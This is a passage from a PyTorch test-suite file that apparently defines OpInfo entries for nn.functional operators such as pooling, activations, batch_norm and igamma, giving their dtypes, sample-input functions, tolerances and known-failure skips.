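# would be flaky across runners.)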
unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ), ), OpInfo('nn.functional.avg_pool2d', aten_name='avg_pool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_avgpool2d, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), )), OpInfo('nn.functional.fractional_max_pool2d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool2d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool2d, decorators=( # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'))), OpInfo('nn.functional.fractional_max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool3d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool3d, decorators=( # FIXME: both derivatives are implemented incorrectly # https://github.com/pytorch/pytorch/issues/69322 # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! 
DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), OpInfo('nn.functional.max_pool1d', aten_name='max_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # Pre-existing condition; needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator', device_type='cpu'), DecorateInfo(unittest.skip("Works on some configs"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Works on some configs"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool2d', aten_name='max_pool2d', supports_autograd=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_gradgrad=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, assert_jit_shape_analysis=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool3d', aten_name='max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), # TODO: investigate nondeterminism gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_unpool1d', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more).
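# (Illustrative sketch of the issue above, not part of the test logic:
# suppose two pooling indices both equal 0. Forward scatters both inputs
# into output[0], so the result depends on write order; analytic backward
# gathers the same grad_output[0] for both inputs, while numerically
# perturbing the "losing" input does not change output[0] at all, so
# gradcheck's finite differences and the analytic gradient disagree.)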
DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), OpInfo('nn.functional.max_unpool1d', variant_test_name='grad', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool2d', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool2d', variant_test_name='grad', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_grad=False, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool3d', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). 
DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool3d', variant_test_name='grad', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.linear', aten_name='linear', supports_autograd=True, sample_inputs_func=sample_inputs_linear, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # linear calls mm under the hood which is nondeterministic on CUDA # https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html#torch.use_deterministic_algorithms gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_expanded_weight=True, decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('nn.functional.bilinear', aten_name='bilinear', supports_autograd=True, sample_inputs_func=sample_inputs_bilinear, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('nn.functional.glu', aten_name='glu', supports_autograd=True, sample_inputs_func=sample_inputs_glu, dtypes=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo( 'nn.functional.elu', aten_backward_name='elu_backward', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.elu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, 
rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), OpInfo( 'nn.functional.prelu', aten_backward_name='prelu_backward', ref=lambda x, weight: np.maximum(0., x) + np.minimum(0., x) * (weight if x.ndim == 1 else weight.reshape([weight.size if i == 1 else 1 for i in range(0, x.ndim)])), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_nn_functional_prelu, decorators=[ # FIXME: second derivative is implemented but seems to be incorrect # https://github.com/pytorch/pytorch/issues/68760 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient # https://github.com/pytorch/pytorch/issues/68752 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ], ), UnaryUfuncInfo( 'nn.functional.celu', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x / alpha) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.celu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.rrelu', aten_backward_name='rrelu_with_noise_backward', op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.rrelu, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'lower': 0., 'upper': 1.}, {'lower': 0., 'upper': 1.}), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(partial(torch.nn.functional.rrelu, inplace=True), input, *args, **kwargs), decorators=( DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # In-place operations do not play well with forward AD # https://github.com/pytorch/pytorch/issues/77447 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), UnaryUfuncInfo( 'nn.functional.selu', ref=lambda x, inplace=False: 1.0507009873554804934193349852946 * ( np.maximum(0., x) + np.minimum(0., 1.6732632423543772848170429916717 * (np.exp(x) - 1)) ), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), 
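# (The two long literals in `ref` above are SELU's standard constants from
# Klambauer et al. 2017, "Self-Normalizing Neural Networks":
# scale ~= 1.0507 and alpha ~= 1.6733.)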
supports_forward_ad=True, # depends on 'elu' supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=lambda x: torch.nn.functional.selu(x, inplace=True), decorators=[ # Not implemented yet (depends on 'elu_') DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-2, rtol=1.8e-2), torch.bfloat16: tol(atol=1e-2, rtol=1.8e-2) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.silu', aten_backward_name='silu_backward', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_autograd=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), ) ), # TODO: combine this with the nn.functional.silu OpInfo when # complex autodiff for silu is supported or when # the forward bug is fixed # Note: silu errors when given inputs that require grad # but it doesn't support grad in their dtype # This is why the dtypes list above passes test_dtypes, # because it's getting lucky and failing in forward # because test_dtypes sets requires_grad to True # THIS IS A BUG UnaryUfuncInfo( 'nn.functional.silu', variant_test_name='complex', ref=lambda x, inplace=False: x / (1 + np.exp(-x)), dtypes=complex_types(), dtypesIfCUDA=empty_types(), supports_forward_ad=False, supports_autograd=False, assert_autodiffed=False, supports_out=False, inplace_variant=lambda x: torch.nn.functional.silu(x, inplace=True), decorators=[ DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-3, rtol=1e-3), torch.bfloat16: tol(atol=1e-4, rtol=1e-4) }), 'TestUnaryUfuncs', device_type='cuda', ), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=(torch.cfloat,), device_type='cpu'), # FIXME: intentionally misreports dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # FIXME: numpy reference diverges: Comparing (nan+nanj) and (-0+0j) DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.complex64, torch.cdouble)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.complex64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.complex64,)))), UnaryUfuncInfo( 'nn.functional.hardsigmoid', aten_backward_name='hardsigmoid_backward', ref=reference_hardsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=False, supports_gradgrad=False, supports_forward_ad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.hardsigmoid, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-04, rtol=0.001)}), 'TestUnaryUfuncs', device_type='cuda',), ], skips=[ # still want to test that first derivative works though 
second derivative isn't supported DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_gradgrad"), # produces 0 instead of nan on ROCM DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_extremal", device_type='cuda', active_if=(TEST_WITH_ROCM)), ] ), UnaryUfuncInfo( 'nn.functional.logsigmoid', aten_name="log_sigmoid", aten_backward_name='log_sigmoid_backward', ref=reference_logsigmoid, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=False, supports_forward_ad=True, supports_gradgrad=True, # autodiff_nonfusible_nodes=["aten::log_sigmoid"], decorators=[ DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_large'), DecorateInfo( precisionOverride({torch.float16: 1e-2, torch.bfloat16: 5e-3}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), ], skips=( # Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cpu'), ), ), UnaryUfuncInfo( 'nn.functional.mish', aten_backward_name='mish_backward', ref=lambda x: x * np.tanh(reference_softplus(x)), dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, inplace_variant=partial(torch.nn.functional.mish, inplace=True), decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestUnaryUfuncs', device_type='cuda',), ], ), UnaryUfuncInfo( 'nn.functional.softsign', ref=lambda x: x / (np.abs(x) + 1), dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1.3e-04)}), 'TestUnaryUfuncs',), ], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int, torch.int8)), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.complex128,)), # pytorch computes (0+nanj), numpy computes (-5e-18-1j) for input (-501.-1.0000e+20j) DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64,)),), ), UnaryUfuncInfo( 'nn.functional.tanhshrink', ref=lambda x: x - np.tanh(x), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, decorators=[ DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo( toleranceOverride({torch.bfloat16: tol(atol=1e-02, rtol=1.6e-02)}), 'TestUnaryUfuncs',), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], skips=( # in each case, pytorch will produce a 
nan while numpy will not DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', "test_reference_numerics_small", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_large", dtypes=(torch.complex64, torch.complex128), active_if=(IS_MACOS)), DecorateInfo(unittest.skip("Fails on some jobs works on others!"), 'TestUnaryUfuncs', "test_reference_numerics_extremal", dtypes=(torch.complex64, torch.complex128), device_type='cpu', active_if=(IS_MACOS or IS_WINDOWS)), ), ), OpInfo( 'nn.functional.threshold', aten_backward_name='threshold_backward', ref=lambda x, threshold, value: np.where(x > threshold, x, value).astype(x.dtype), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_threshold, ), OpInfo( "nn.functional.triplet_margin_loss", sample_inputs_func=sample_inputs_triplet_margin_loss, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo( "nn.functional.triplet_margin_with_distance_loss", sample_inputs_func=partial(sample_inputs_triplet_margin_loss, with_distance=True), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # This test cannot handle a callable passed to `distance_function`. If we would use # `distance_function=None`, the test would pass fine. DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), DecorateInfo( unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive", ), ), ), BinaryUfuncInfo('nextafter', dtypes=floating_types_and(torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False), OpInfo('topk', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_topk), # Multiple variants for batch_norm to test with and without cuDNN disabled # See https://github.com/pytorch/pytorch/pull/63218#discussion_r688549391 for more details OpInfo('nn.functional.batch_norm', aten_name='batch_norm', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, sample_inputs_func=sample_inputs_batch_norm, skips=( # see https://github.com/pytorch/pytorch/issues/71286 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.bfloat16,)), # see https://github.com/pytorch/pytorch/issues/76283 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type="cpu"), # Trying to use forward AD with miopen_batch_norm that does not support it # because it has not been implemented yet. 
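# (ROCm builds dispatch batch_norm to miopen_batch_norm, which is why the
# failure below is guarded with device_type="cuda" and
# active_if=TEST_WITH_ROCM.)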
DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type="cuda", active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), # This variant tests batch_norm with cuDNN disabled only on CUDA devices OpInfo('nn.functional.batch_norm', variant_test_name='without_cudnn', aten_name='batch_norm', dtypes=empty_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[onlyCUDA, disablecuDNN], skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), sample_inputs_func=sample_inputs_batch_norm), OpInfo( "nn.functional.binary_cross_entropy", aten_backward_name='binary_cross_entropy_backward', sample_inputs_func=sample_inputs_binary_cross_entropy, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, gradcheck_fast_mode=False, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestCudaFuserOpInfo", ), # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestNNCOpInfo", "test_nnc_correctness", ), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-3, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", ), ), skips=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), ), ), # We have to add two OpInfo entries for `igamma` and `igammac`. The first is the # standard entry; the second is to run gradcheck tests on the second argument. BinaryUfuncInfo('igamma', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammainc',), dtypesIfCUDA=floating_types(), # TODO: FIXME supports_rhs_python_scalar=False, supports_autograd=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igamma', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments. # op=lambda self, other, **kwargs: torch.igamma(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # skips=( # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails as we permute the arguments for the function variant # # but not for inplace or method.
# DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igamma(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), BinaryUfuncInfo('igammac', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammaincc',), dtypesIfCUDA=floating_types(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igammac', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments. # op=lambda self, other, **kwargs: torch.igammac(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # ], # skips=( # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails as we permute the arguments for the function variant # # but not for inplace or method.
